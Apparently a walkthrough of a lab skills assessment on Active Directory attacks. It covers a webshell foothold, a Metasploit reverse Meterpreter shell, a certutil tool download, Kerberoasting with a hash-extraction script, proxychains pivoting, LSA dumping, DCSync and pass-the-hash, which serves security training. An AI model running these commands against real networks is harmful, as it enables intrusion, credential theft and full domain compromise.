
Active Directory Enumeration and Attacks - Skills Assessment Part 1

Jun 27, 2024

Overview

  • Focus on Active Directory (AD) enumeration and attacks
  • Finding a working attack path takes research and trial and error
  • Uses Metasploit for a reverse shell and for pivoting from the initial foothold into the internal AD network, driven from a Linux attack host
  • The assessment is involved because of the number of AD-specific steps that have to be chained together

Initial Access

Webshell

  • Start with a pre-existing webshell in the uploads directory (the Antak webshell, antak.aspx)
  • Login credentials provided: admin with a specific password
  • Webshell usability: the output pane fills quickly, so clear the screen often; there is no real working directory, so use absolute paths
  • First task: Retrieve the contents of a flag located on the Administrator's desktop
    • Command: type C:\Users\Administrator\Desktop\flag.txt (Antak runs PowerShell, so cat, an alias for Get-Content, works too)

Enhancing Shell Access

Metasploit Reverse Shell

  • Use msfconsole to get a more interactive session than the webshell offers
  • Set up a reverse TCP Meterpreter payload
    • Get the attacker's IP for LHOST (ip a or ifconfig)
    • Command sequence: search web_delivery, use exploit/multi/script/web_delivery (the notes' "use 1" selects it by its index in the search results), set target 2 (PSH), set payload windows/x64/meterpreter/reverse_tcp (match the target's architecture), set LHOST and LPORT, run
    • Copy the generated PowerShell one-liner into the webshell; it fetches the stage from the web_delivery listener, so the target must be able to reach the attacker's host and port
    • Once the session lands, migrate to a longer-lived process; winlogon.exe only works if the session already runs as SYSTEM, otherwise pick a process owned by the current user

Tool Upload

PowerView

  • Obtain PowerView.ps1 (from the PowerSploit repository's Recon directory) for AD enumeration
    • Use wget on the attack host to download PowerView.ps1
    • Serve it from that directory with python3 -m http.server 8000 (any port the target can reach)
    • On the target, fetch it with certutil.exe -urlcache -split -f http://<attacker-ip>:8000/PowerView.ps1 C:\Windows\Temp\PowerView.ps1 (use a directory the webshell's account can write to; certutil downloads are a well-known LOLBin trick that AV/EDR commonly flags, which does not matter in this lab)
    • Verification: dir the directory and confirm PowerView.ps1 is present with a non-zero size

Active Directory Enumeration

PowerShell Commands

  • Import PowerView and enumerate accounts that have a service principal name (SPN) set, i.e. Kerberoastable service accounts
    • Import-Module .\PowerView.ps1, then Get-DomainUser -SPN
    • Note the samAccountName and SPN of the account of interest
  • Request a service ticket for that account and format it for cracking
    • Get-DomainUser -Identity <user> | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
    • Export-Csv wraps the $krb5tgs$23$... hash in quotes next to the other columns; extract the Hash value as a single line before cracking
    • Crack with hashcat -m 13100 (Kerberos 5 TGS-REP, etype 23) against a wordlist to recover the password
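The Export-Csv step leaves the ticket wrapped in quotes next to four other columns, and pasting it out of the webshell tends to add line breaks, so here is an added example (my own script, not part of the original notes or of PowerView) that turns that CSV into a hashcat-ready hash list. The CSV text embedded in it is a constructed sample with shortened, made-up hashes; the column names are the ones PowerView emits, and the example.local domain and host names are placeholders.

```python
"""Pull Kerberoast hashes out of PowerView's Export-Csv output for hashcat.

Added example, not part of the original notes. It assumes the CSV came from
`Get-DomainSPNTicket -Format Hashcat | Export-Csv`, whose Hash column holds
`$krb5tgs$<etype>$*<sam>$<realm>$<spn>*$<checksum>$<edata>`.
"""
import csv
import io
import re
import sys

# Constructed sample: a PowerShell 5 "#TYPE" prefix line, the PowerView column
# set, one RC4 (etype 23) ticket whose hash was wrapped across two lines when
# copied out of the webshell, and one AES (etype 18) ticket. Hashes are fake
# and far shorter than real ones.
SAMPLE_CSV = (
    "#TYPE System.Management.Automation.PSCustomObject\r\n"
    '"SamAccountName","DistinguishedName","ServicePrincipalName","TicketByteHexStream","Hash"\r\n'
    '"svc_sql","CN=svc_sql,CN=Users,DC=example,DC=local","MSSQLSvc/sql01.example.local:1433","6182",'
    '"$krb5tgs$23$*svc_sql$EXAMPLE.LOCAL$MSSQLSvc/sql01.example.local:1433*'
    '$0123456789abcdef0123456789abcdef$a1b2c3d4e5f6\r\na7b8c9d0e1f2"\r\n'
    '"svc_web","CN=svc_web,CN=Users,DC=example,DC=local","HTTP/web01.example.local","6182",'
    '"$krb5tgs$18$*svc_web$EXAMPLE.LOCAL$HTTP/web01.example.local*'
    '$00112233445566778899aabbccddeeff$ffeeddcc"\r\n'
)

# PowerView-style hashcat line. SPNs contain ':' and '/' but never '$' or '*'.
HASH_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<sam>[^$*]+)\$(?P<realm>[^$*]*)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# hashcat cracks this layout only as mode 13100 (RC4-HMAC, etype 23). AES
# tickets (etype 17/18) need a different line format, so they are flagged.
HASHCAT_MODES = {23: 13100}


def hashcat_mode(etype: int):
    """Return the hashcat mode for a ticket etype, or None if unsupported here."""
    return HASHCAT_MODES.get(etype)


def extract_hashes(csv_text: str) -> list:
    """Parse Export-Csv text into dicts with sam, realm, spn, etype and a one-line hash."""
    # PowerShell 5 prefixes a "#TYPE ..." line unless -NoTypeInformation was used.
    if csv_text.startswith("#TYPE"):
        csv_text = csv_text.split("\n", 1)[1]
    entries = []
    for row in csv.DictReader(io.StringIO(csv_text, newline="")):
        raw = row.get("Hash") or ""
        # Hashes copied out of a webshell pane arrive wrapped across lines.
        h = re.sub(r"\s+", "", raw)
        m = HASH_RE.match(h)
        if not m:
            print(f"skipping malformed hash for {row.get('SamAccountName')}", file=sys.stderr)
            continue
        entries.append({
            "sam": m["sam"], "realm": m["realm"], "spn": m["spn"],
            "etype": int(m["etype"]), "hash": h,
        })
    return entries


def crackable_lines(entries: list) -> list:
    """One hash per line, keeping only the etypes hashcat mode 13100 accepts."""
    return [e["hash"] for e in entries if hashcat_mode(e["etype"]) is not None]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # utf-8-sig also swallows the BOM that some PowerShell versions write
        with open(sys.argv[1], encoding="utf-8-sig") as f:
            src = f.read()
    else:
        src = SAMPLE_CSV
    found = extract_hashes(src)
    for e in found:
        mode = hashcat_mode(e["etype"])
        print(f"{e['sam']:<12} {e['spn']:<40} etype={e['etype']} "
              f"hashcat -m {mode if mode else 'unsupported'}", file=sys.stderr)
    print("\n".join(crackable_lines(found)))
```

Run it as python3 spn_csv_to_hashcat.py ticket.csv > ticket.hashes and feed the result to hashcat -m 13100 ticket.hashes <wordlist>; the per-account summary goes to stderr so only hashes land in the file.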

Pivoting and Network Scanning

Using Metasploit and ProxyChains

  • Set up a pivot so traffic from the attack host can reach the internal AD network through the Meterpreter session
    • In the session, run autoroute -s <internal-subnet>/24 (or use post/multi/manage/autoroute); this only routes Metasploit modules through the session
    • For external tools (CrackMapExec, Impacket), also start auxiliary/server/socks_proxy and add its listener (for example socks5 127.0.0.1 1080) to /etc/proxychains.conf, then prefix commands with proxychains
  • Use auxiliary/scanner/portscan/tcp with RHOSTS set to the internal range (and PORTS narrowed to AD services such as 88, 135, 139, 389, 445) to identify live machines; the domain controller is the host with 88 (Kerberos) and 389 (LDAP) open

Exploiting AD Network

CrackMapExec and LSA Dump

  • Use CrackMapExec through the proxy to confirm SMB access with the cracked credentials and dump LSA secrets, which here yield a further user's clear-text password
    • Command shape: proxychains crackmapexec smb <target> -u <user> -p '<password>' --lsa (the --lsa dump requires local admin on the target)
    • Target machine: pick it from the port scanner results (a host with 445 open)
    • Extract the credentials that appear in the dump

DC Sync Attack

  • Use secretsdump.py for a DCSync attack to obtain the Administrator's NT hash
    • Command shape: proxychains secretsdump.py -just-dc-user Administrator <domain>/<user>:'<password>'@<dc-ip>
    • Use the cracked user's credentials; DCSync only succeeds for an account with directory replication rights (by default Domain Admins, Enterprise Admins and the DCs themselves)
    • Record the NT hash from the Administrator:500:<LM>:<NT>::: line

Final Access and Flag Capture

  • Use wmiexec.py with the Administrator's NT hash (pass-the-hash) to connect: proxychains wmiexec.py -hashes :<NT-hash> <domain>/Administrator@<target> (the LM half of -hashes can be left empty)
  • Verify administrator access (whoami) and retrieve the final flag
    • Use type to read the flag on the remote server

Summary

  • Method involved pivoting, tool uploads, enumeration, and exploitation
  • Demonstrated approach for gaining AD administrator access through multiple attack stages